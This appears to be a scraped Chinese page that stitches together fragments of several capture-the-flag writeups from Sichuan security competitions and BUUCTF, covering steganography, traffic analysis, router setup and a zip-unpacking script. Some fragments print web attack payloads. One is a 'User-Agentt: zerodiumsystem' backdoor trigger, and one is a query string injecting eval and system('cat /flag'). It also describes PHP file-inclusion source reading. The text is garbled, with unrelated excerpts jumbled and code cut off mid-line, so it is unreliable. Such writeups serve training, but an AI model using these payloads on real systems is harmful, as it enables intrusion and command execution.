2024年四川省第二届网信行业技能竞赛-数据安全赛项决赛Writeup

文章目录WEBMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查和团队的师傅们组队拿了个第十，师傅们带飞，我就是团队的MVP(Most Vegetable People)WEB等复现环境出来了再写MISC签到公众号语音识别：异世相遇！尽享美味！安恒赛高！见笑了，偶四南方银，藕的普通话不镖准哈哈哈~DASCTF{welcome_to_march_dasctf}简单的png隐写一

BUUCTF：[BSidesCF 2020]Had a bad day可能存在SQL注入或者文件包含，在我尝试读取index.php源码的时候出现了报错信息的确是文件包含，但是有index.php却读取错误，报错显示无法打开流：操作失败在后面测试的时候，发现除掉后缀即可读取到源码base64解码读取源码<?php$file = $_GET['category'];...

首先把基本的路由器接口地址按照上图配置好Trust: R1:syssysname R1int e0/0/0ip address 192.168.1.2 24DMZ: R2:syssysname R2int e0/0/0ip address 172.16.1.2 24Untrust: R3:syssysname R3int e0/0/0ip address 202.1.1.2 24进入防火墙把接口地

2023年四川省网络与信息安全技能大赛初赛 个人赛 Writeup

文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectrafficWeb签到http://cn-sec.com/archives/313267.htmlUser-Agentt: zerodiumsystem("cat /flag");unsetme这题先放着/?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27)

2024年四川省第二届网信行业技能竞赛-数据安全赛项决赛Writeup

2025数字中国创新大赛-数字安全赛道数据安全产业积分争夺赛决赛Writeup

https://buuoj.cn/challenges#[MRCTF2020]%E5%8D%83%E5%B1%82%E5%A5%97%E8%B7%AF套娃题，拿脚本解压import zipfilename = '0573'while True:fz = zipfile.ZipFile(name + '.zip', 'r')fz.extractall(pwd=bytes(name, 'utf-8')

题目地址：https://buuoj.cn/challenges#wireshark根据提示直接过滤出POST包http.request.method==POSTflag{ffb7567a1d4f4abdffdb54e022f8facd}